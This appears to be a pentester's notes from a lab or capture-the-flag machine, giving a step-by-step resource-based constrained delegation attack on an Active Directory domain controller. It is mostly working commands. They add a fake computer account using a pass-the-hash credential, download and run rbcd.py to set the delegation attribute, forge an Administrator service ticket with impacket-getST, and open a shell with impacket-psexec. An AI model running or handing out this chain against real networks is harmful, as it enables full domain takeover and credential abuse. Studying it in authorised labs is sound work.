Resourced Contrained Delegation

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

So the steps here are:

• create a new computer object

• change msDS-AllowedToActOnBehalfOfOtherIdentity attribute so the created computer can impersonate of authenticate as any user to the attacking object in this example DC

• requesting ticket for newly created computer as Administrator

• access C$ share -> psexec as administrator

To make this in Windows shell PowerView and Powermad script are necessary

#check ms-ds-machineaccountquota, if user can add new computer to the domain
Get-DomainObject -Identity "dc=resourced,dc=local" -Domain resourced.local | Select-Object -Property ms-ds-machineaccountquota

#check DC version at least 2012
Get-DomainController | Select-Object -Property OSVersion

#check if attribute is not already set
Get-NetComputer RESOURCEDC | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

Adding New Computer object

impacket-addcomputer resourced.local/l.livingstone -dc-ip $ip -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'FAKE01$' -computer-pass '123456'

Get-adcomputer fake01

Modifying Target Computer's AD Object

wget https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
sudo python3 rbcd.py -dc-ip $ip -t RESOURCEDC -f 'FAKE01' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone

#Check if the attribute was set
Get-adcomputer resourcedc -properties msds-allowedtoactonbehalfofotheridentity |select -expand msds-allowedtoactonbehalfofotheridentity

impacket-getST -spn cifs/resourcedc.resourced.local resourced/fake01\$:'123456' -impersonate Administrator -dc-ip 192.168.54.175

export KRB5CCNAME=./Administrator.ccache

impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip $ip